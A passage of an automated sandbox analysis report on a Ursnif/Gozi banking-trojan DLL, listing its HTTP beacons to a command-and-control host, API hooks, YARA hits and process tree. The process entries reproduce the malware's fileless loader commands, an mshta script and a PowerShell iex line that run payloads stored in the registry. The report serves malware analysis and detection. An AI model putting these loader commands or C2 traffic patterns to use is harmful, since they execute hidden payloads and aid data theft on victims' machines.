                                                                                Host: api3.lepini.at
Feb 16, 2021 00:59:06.251410007 CET | 8803 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:59:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49801 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:59:06.736301899 CET | 8804 | OUT | POST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
                                                                                Content-Length: 2
                                                                                Host: api3.lepini.at
Feb 16, 2021 00:59:06.736310005 CET | 8804 | OUT | Data Raw: 0d 0a
                                                                                Data Ascii:
Feb 16, 2021 00:59:07.282991886 CET | 8805 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:59:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49802 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:59:08.534192085 CET | 8806 | OUT | GET /api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
                                                                                Host: api3.lepini.at
Feb 16, 2021 00:59:08.940006018 CET | 8849 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:59:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 16, 2021 00:57:34.812472105 CET | 104.20.184.68 | 443 | 192.168.2.4 | 49746 | CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Fri Feb 12 01:00:00 CET 2021 | Sat Feb 12 00:59:59 CET 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 | |
Feb 16, 2021 00:57:34.844383001 CET | 104.20.184.68 | 443 | 192.168.2.4 | 49747 | CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Fri Feb 12 01:00:00 CET 2021 | Sat Feb 12 00:59:59 CET 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 | |
Feb 16, 2021 00:57:39.578773975 CET | 151.101.1.44 | 443 | 192.168.2.4 | 49764 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 | |
Feb 16, 2021 00:57:39.584134102 CET | 151.101.1.44 | 443 | 192.168.2.4 | 49763 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 | |
Feb 16, 2021 00:57:39.584671021 CET | 151.101.1.44 | 443 | 192.168.2.4 | 49759 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 | |
Feb 16, 2021 00:57:39.585233927 CET | 151.101.1.44 | 443 | 192.168.2.4 | 49760 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 | |
Feb 16, 2021 00:57:39.601056099 CET | 151.101.1.44 | 443 | 192.168.2.4 | 49761 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 | |
Feb 16, 2021 00:57:39.601790905 CET | 151.101.1.44 | 443 | 192.168.2.4 | 49762 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 | |

                                                                                Code Manipulations

                                                                                User Modules

                                                                                Hook Summary

Function Name | Hook Type | Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe
CreateProcessAsUserW | EAT | explorer.exe
CreateProcessAsUserW | INLINE | explorer.exe
CreateProcessW | EAT | explorer.exe
CreateProcessW | INLINE | explorer.exe
CreateProcessA | EAT | explorer.exe
CreateProcessA | INLINE | explorer.exe

                                                                                Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 4DA719C

Process: explorer.exe, Module: KERNEL32.DLL
Function Name | Hook Type | New Data
CreateProcessAsUserW | EAT | 7FFABB03521C
CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW | EAT | 7FFABB035200
CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA | EAT | 7FFABB03520E
CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll
Function Name | Hook Type | New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 4DA719C

                                                                                Statistics

                                                                                CPU Usage

                                                                                Memory Usage

                                                                                High Level Behavior Distribution

                                                                                Behavior

                                                                                System Behavior

                                                                                General

                                                                                Start time:00:57:28
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\loaddll32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll'
                                                                                Imagebase:0x870000
                                                                                File size:121856 bytes
                                                                                MD5 hash:8081BC925DFC69D40463079233C90FA5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:00:57:28
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
                                                                                Imagebase:0x1280000
                                                                                File size:20992 bytes
                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:57:29
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                Imagebase:0x11d0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:57:29
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                Imagebase:0x7ff7979a0000
                                                                                File size:823560 bytes
                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:57:30
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2
                                                                                Imagebase:0x250000
                                                                                File size:822536 bytes
                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:58:07
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2
                                                                                Imagebase:0x250000
                                                                                File size:822536 bytes
                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:58:12
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2
                                                                                Imagebase:0x250000
                                                                                File size:822536 bytes
                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:58:15
                                                                                Start date:16/02/2021
                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2
                                                                                Imagebase:0x250000
                                                                                File size:822536 bytes
                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:58:23
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                Imagebase:0x7ff71e320000
                                                                                File size:14848 bytes
                                                                                MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000016.00000003.789528617.000001F2CB9EF000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:00:58:25
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                Imagebase:0x7ff7bedd0000
                                                                                File size:447488 bytes
                                                                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:58:25
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff724c50000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:00:58:32
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
                                                                                Imagebase:0x7ff696a20000
                                                                                File size:2739304 bytes
                                                                                MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:00:58:34
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
                                                                                Imagebase:0x7ff768940000
                                                                                File size:47280 bytes
                                                                                MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:00:58:37
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
                                                                                Imagebase:0x7ff696a20000
                                                                                File size:2739304 bytes
                                                                                MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Start time:00:58:38
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
                                                                                Imagebase:0x7ff768940000
                                                                                File size:47280 bytes
                                                                                MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:00:58:44
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff6fee60000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                General

                                                                                Start time:00:58:44
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\control.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\control.exe -h
                                                                                Imagebase:0x7ff635e60000
                                                                                File size:117760 bytes
                                                                                MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                General

                                                                                Start time:00:58:52
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff6b0ff0000
                                                                                File size:99272 bytes
                                                                                MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                General

                                                                                Start time:00:58:52
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                Imagebase:0x7ff6c5cf0000
                                                                                File size:69632 bytes
                                                                                MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                General

                                                                                Start time:00:58:56
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff6b0ff0000
                                                                                File size:99272 bytes
                                                                                MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                General

                                                                                Start time:00:59:00
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff6b0ff0000
                                                                                File size:99272 bytes
                                                                                MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
